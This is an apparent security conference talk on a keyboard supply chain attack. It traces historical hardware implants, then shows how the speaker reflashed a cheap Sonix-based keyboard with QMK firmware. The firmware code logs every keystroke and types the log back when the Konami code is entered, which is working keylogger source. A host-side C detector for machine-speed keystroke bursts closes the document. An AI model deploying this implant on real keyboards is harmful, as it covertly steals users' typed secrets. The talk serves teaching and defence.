A Practical Supply Chain Hack

Blinking RGBs for fun & profit.

A "Shaggy Dog" hacking story

Who Am I? - Dale Nunns

Father, Husband, Software Developer, Hardware Hacker, Maker, Retro Computer Enthusiast, 🍕 Pizza Maker
  • 🌞 Team-Lead & Senior Software Developer at StructureIT building distributed, big data systems for the structured finance markets.
  • 🌙 In my free time I take things apart and occasionally they go back together.
  • 🍕 Most famous for posting way too many photos of home-made Pizza on Twitter
  • 🎤 Regular speaker at BSides Cape Town & DevConf

I'm a jack of all trades, serial skill collector and high-functioning hoarder.

  • I'm not a nation-state hacker.

  • I'm not employed by a 3 letter agency.

  • I'm not here to sell you tools or services.

  • I'm not even "in" infosec.

  • I'm just a guy who enjoys taking things apart.

  • This talk is not about scaring you, it's about showing you a whole new world 🎶


What is a Supply Chain ?

  • A supply chain is a system of organizations, people, activities, information and resources involved in moving a product or service from supplier to customer.

  • It's all the steps that need to happen for a product to get from where it is produced to where it's sold.


What is a supply chain hack?

BSides Cape Town 2018 - Lightning Talk


In 2018 this was probably the most widely discussed "supply chain hack" (and a still-disputed one).

Bloomberg Business - The Big Hack


1970s - Cold War

The USSR built a bug that they installed into a batch of IBM Selectric typewriters destined for the US Embassy in Moscow. The implant sat inside the machine and reported what was typed, long before anything was encrypted or sent.

CryptoMuseum: Selectric bug


2008-2009 NSA ANT Catalog

The NSA ANT catalog is a 50-page classified document listing technology available to the United States National Security Agency (NSA) Tailored Access Operations (TAO) by the Advanced Network Technology (ANT) Division to aid in cyber surveillance.


2010 - NSA "upgrades" Cisco Hardware

NSA TAO (Tailored Access Operations) Unit intercepted and "upgraded" hardware shipped to organizations targeted for surveillance. - Ars Technica


Can I build it?


Some basic constraints

  • Cheap
  • Minimal Tools / Equipment / Skills
  • Easily Reproducible
  • Hard to detect
  • Practical
  • Need to be able to sneak it past my wife. 🥰


🙋 Hands up

  • Who uses a wired USB Keyboard?

  • Who has typed something on their keyboard they need/want to keep a secret?

  • Who of you would like a free RGB Gaming Keyboard?


Why Keyboards?

  • Cheap
  • Easily Available
  • Everyone uses them
  • You type your secrets on them
  • My wife won't find a few of them arriving too suspicious (I hope 🀞)


How Modern Keyboards Work

  • Keyboard Matrix (A,B,C,D)
  • Keyboard Controller / Microcontroller
  • USB
  • RGB LED Controller

Part II - The Shaggy Dog Hacking Story

A tale of serendipitous discovery.

  • Dragons
  • LEDs
  • And turning devices into paper-weights

Projects / Talks - Expectation


Projects / Talks - Reality


Foxxray Chronus - FXR-HKM-80


Nice Keyboard, brain-dead key mapping.


Foxxray Chronus

  • SX93F93BN
  • Appears to be made by SHINETEK
  • No information online
  • Closest datasheet was for a SX93099-200F
  • No software update from Foxxray

QMK Firmware

  • QMK https://qmk.fm/
  • Open-source keyboard firmware
  • Used by lots of community made custom keyboards
  • There are other similar projects like ZMK (http://zmk.dev)
  • For use with Arduino, Teensy and Pi Pico microcontroller dev-boards.

SonixQMK

  • SonixQMK https://github.com/SonixQMK
  • Open-source
  • Port of QMK to the Sonix SN32 Microcontroller (ARM Cortex-M0)
  • Supports some keyboards by Keychron and Redragon along with some other keyboard manufacturers
Rebranded Sonix parts found in keyboards:

Company  MCU          Rebrand company  Rebrand MCU  Type           Pin
eVision  VS11K09A     SONIX            SN32F248     ARM Cortex-M0  LQFP 64 Pins
eVision  VS11K09A-1   SONIX            SN32F248B    ARM Cortex-M0  LQFP 64 Pins
eVision  VS11K13A     SONIX            SN32F268     ARM Cortex-M0  LQFP 48 Pins
eVision  VS11K15A     SONIX            SN32F268     ARM Cortex-M0  LQFP 48 Pins
eVision  VS11K16A     SONIX            SN32F268     ARM Cortex-M0  LQFP 48 Pins
eVision  VS11K17A     SONIX            SN32F268     ARM Cortex-M0  LQFP 48 Pins
eVision  VS11K20A     SONIX            SN32F268     ARM Cortex-M0  LQFP 48 Pins
HFD      HFD2201KBA   SONIX            SN32F248B    ARM Cortex-M0  LQFP 64 Pins
HFD      HFD48KP500   SONIX            SN32F268     ARM Cortex-M0  LQFP 48 Pins
HFD      HFD64KG800   SONIX            SN32F248B    ARM Cortex-M0  LQFP 64 Pins
SONIX    SN32F248     No               No           ARM Cortex-M0  LQFP 64 Pins
SONIX    SN32F248B    No               No           ARM Cortex-M0  LQFP 64 Pins
SONIX    SN32F268     No               No           ARM Cortex-M0  LQFP 48 Pins

Redragon K630W


Nice Keyboard and supposedly supported by SonixQMK


Redragon K630W

  • eVision VS11K28A
  • Not supported by SonixQMK (SonixQMK does support other eVision ICs, but those are rebranded Sonix ICs; this one is not)
  • No Datasheet online

Redragon K630W

  • SonixQMK only supports the Redragon K630
  • The Redragon K630W is the same keyboard but with a totally different microcontroller.
  • All I can find online are hints that it's 8051-based
  • No software updates available online for the Redragon K630W 😒

VS11K28A

  • Redragon_K589RGB-8409_V0100-VS11K28A-CN_EN-20220825.zip
  • Running it, it detected the keyboard and immediately put it into Bootloader mode
  • Nothing I do will get it out of bootloader mode.
  • Device now shows up as a Microdia CH555 instead of EVision RGB Keyboard

WCH

  • Best known for the CH340/CH343 family of USB to TTL serial converters
  • WCH have RISC-V and Arm Cortex-M Microcontrollers

CH555

  • E8051 - Enhanced 8051 architecture
  • Not listed on the WCH site anywhere
  • Could be supported by SDCC (Small Device C Compiler)

What next?

  • Reverse engineer the firmware update application to be able to get the protocol used to program the keyboard.
  • Find and setup a build environment for the microcontroller.
  • Reverse engineer the keyboard wiring.
  • Write new firmware.

The problem?

The only flux-capacitor I have is this one and it's running some dodgy BASIC firmware.


I'm a high-functioning hoarder.


Marvo Keyboard - K6901

  • I bought this for R 59.00 from Cash Converters about 3 years ago, for "reasons".
  • It's been in my "to hack" cupboard/pile/room waiting ever since.


Marvo K6901 - Keyboard

  • eVision VS11K15A
  • Which is actually a SONIX SN32F268 (ARM Cortex-M0)
  • This microcontroller is supported by SonixQMK 🎉

Bootloader / Jumploader

  • Click the button to Reboot to Bootloader [eVision]
  • Burn the jumploader-generic.bin from the sonix-keyboard-bootloader repo. This is a generic SN32F260 bootloader that lets you flash new firmware over USB without opening the keyboard again.

Mapping the keyboard

  • Hot beverage & Sea Shanties are essential

Logging Keys

#include QMK_KEYBOARD_H

#define MAX_KEYLOG_BUFFER_LENGTH 256   /* buffer size assumed; not shown on the slide */

/* Ring buffer of QMK keycodes (not characters: modifiers and layer keys are
 * recorded as their own presses). Once full, the oldest entry is overwritten. */
static uint16_t keylog[MAX_KEYLOG_BUFFER_LENGTH];
static int keylogPos = 0;

static void log_key(uint16_t keycode, keyrecord_t *record);

/* Keyboard-level hook: QMK calls this for every key event before the user-level
 * hook, so every press is recorded and then passed on unchanged. */
bool process_record_kb(uint16_t keycode, keyrecord_t *record) {
	if (record->event.pressed) { log_key(keycode, record); }
	return process_record_user(keycode, record);
}

static void log_key(uint16_t keycode, keyrecord_t *record) {
	(void)record;
	keylog[keylogPos] = keycode;
	keylogPos++;
	if (keylogPos >= MAX_KEYLOG_BUFFER_LENGTH) { keylogPos = 0; }
}

Dump Keys

/* Trigger sequence (the Konami code); the commented-out alternative is "hunter3". */
//uint16_t dumpKey[] = {KC_H,KC_U,KC_N,KC_T,KC_E,KC_R,KC_3};
static const uint16_t dumpKey[] = {KC_UP,KC_UP,KC_DOWN,KC_DOWN,KC_LEFT,KC_RIGHT,KC_LEFT,KC_RIGHT,KC_A,KC_B};
#define DUMP_KEY_LEN (sizeof(dumpKey) / sizeof(dumpKey[0]))
static size_t dumpKeyPos = 0;

/* dump_keylog() is not shown on the slide; this is an assumed implementation.
 * keylogPos is the next slot to write, so once the ring buffer has wrapped it is
 * also the oldest entry: walk from there and "type" each keycode back to the host. */
static void dump_keylog(void) {
	for (int i = 0; i < MAX_KEYLOG_BUFFER_LENGTH; i++) {
		uint16_t kc = keylog[(keylogPos + i) % MAX_KEYLOG_BUFFER_LENGTH];
		if (kc != KC_NO) { tap_code16(kc); }
	}
}

bool process_record_user(uint16_t keycode, keyrecord_t *record) {
	if (record->event.pressed) {
		if (keycode == dumpKey[dumpKeyPos]) {
			dumpKeyPos++;
			if (dumpKeyPos >= DUMP_KEY_LEN) {
				dumpKeyPos = 0;   /* reset, otherwise the next press indexes past the array */
				SEND_STRING("\nAll Your String Belong To Us\n");
				dump_keylog();
				SEND_STRING("\n--------\n");
			}
		} else { dumpKeyPos = 0; }
	}

	return true;
}

Demo Time


Wrapping Up

  • Can this be improved ?
  • How do you protect yourself from this kind of attack ?
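One answer to the protection question, as an added example that is not from the talk: the implant exfiltrates by typing its buffer back through the same HID interface, and firmware types far faster than a human. A host can watch inter-key timing and raise an alert on a long run of machine-speed key-downs. The code below is plain C with a constructed event stream standing in for what you would read from evdev or a HID report log; the thresholds (20 ms gap, 8 keys) are assumptions for illustration, not values measured from the talk's keyboard.

```c
/*
 * Host-side check for the "dump" phase of a keyboard implant.
 * Scans key-down events in time order for a run of consecutive presses
 * that are only a few milliseconds apart. Thresholds are assumptions.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_GAP_MS 20u  /* assumed: a human rarely sustains < 20 ms between key-downs */
#define MIN_RUN    8u   /* assumed: fast key-downs in a row before we alert */

typedef struct {
    uint32_t t_ms;  /* monotonic timestamp of the key-down, in milliseconds */
    uint16_t code;  /* HID usage of the key; carried for reporting only */
} key_event_t;

/* Longest run of consecutive events where each gap to the previous event is
 * <= max_gap_ms. Returns the run length (0 for no events) and stores the index
 * of the run's first event in *start. Events must be in time order; an
 * out-of-order timestamp wraps the unsigned subtraction and just ends the run. */
size_t longest_fast_run(const key_event_t *ev, size_t n, uint32_t max_gap_ms, size_t *start)
{
    size_t best_len = 0, best_start = 0, run_len = 0, run_start = 0;
    for (size_t i = 0; i < n; i++) {
        if (i > 0 && ev[i].t_ms - ev[i - 1].t_ms <= max_gap_ms) {
            run_len++;
        } else {
            run_start = i;
            run_len = 1;
        }
        if (run_len > best_len) {
            best_len = run_len;
            best_start = run_start;
        }
    }
    if (start) *start = best_start;
    return best_len;
}

/* True when the stream contains at least MIN_RUN machine-speed key-downs in a
 * row; *start and *len describe the longest fast run either way. */
bool looks_like_implant_dump(const key_event_t *ev, size_t n, size_t *start, size_t *len)
{
    size_t s = 0;
    size_t l = longest_fast_run(ev, n, MAX_GAP_MS, &s);
    if (start) *start = s;
    if (len) *len = l;
    return l >= MIN_RUN;
}

/* Constructed sample, not a real capture: 12 human keystrokes (90..220 ms
 * apart), then a 30-key dump typed 3 ms apart, then 5 more human keys. */
size_t build_sample(key_event_t *out, size_t cap)
{
    static const uint32_t human_gaps[11] = {150, 95, 210, 120, 180, 90, 140, 220, 110, 160, 130};
    static const uint32_t tail_gaps[5]   = {400, 120, 180, 95, 210};
    size_t n = 0;
    uint32_t t = 1000;
    if (n < cap) out[n++] = (key_event_t){t, 0x04};   /* HID usage 0x04 = 'a' */
    for (size_t i = 0; i < 11 && n < cap; i++) {
        t += human_gaps[i];
        out[n++] = (key_event_t){t, (uint16_t)(0x05 + i)};
    }
    for (size_t i = 0; i < 30 && n < cap; i++) {
        t += (i == 0) ? 40 : 3;   /* firmware pauses briefly, then types flat out */
        out[n++] = (key_event_t){t, (uint16_t)(0x04 + (i % 26))};
    }
    for (size_t i = 0; i < 5 && n < cap; i++) {
        t += tail_gaps[i];
        out[n++] = (key_event_t){t, (uint16_t)(0x04 + i)};
    }
    return n;
}

int main(void)
{
    key_event_t ev[64];
    size_t n = build_sample(ev, sizeof ev / sizeof ev[0]);
    size_t start = 0, len = 0;
    if (looks_like_implant_dump(ev, n, &start, &len)) {
        printf("ALERT: %zu key-downs <= %u ms apart starting at event %zu (t=%u ms)\n",
               len, MAX_GAP_MS, start, (unsigned)ev[start].t_ms);
    } else {
        printf("no machine-speed burst (longest fast run: %zu)\n", len);
    }
    return 0;
}
```

Expect false positives from anything else that injects keystrokes at machine speed (hardware macro keys, password managers that type credentials, remote-desktop tools), so treat a hit as a prompt to look at the device rather than as proof. The heuristic also only catches this particular exfiltration path; a keyboard that logs to flash and dumps over a second, hidden USB interface would not trip it, which is why checking what interfaces and descriptors a new keyboard actually exposes is still worth doing.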

Follow, Subscribe, Like etc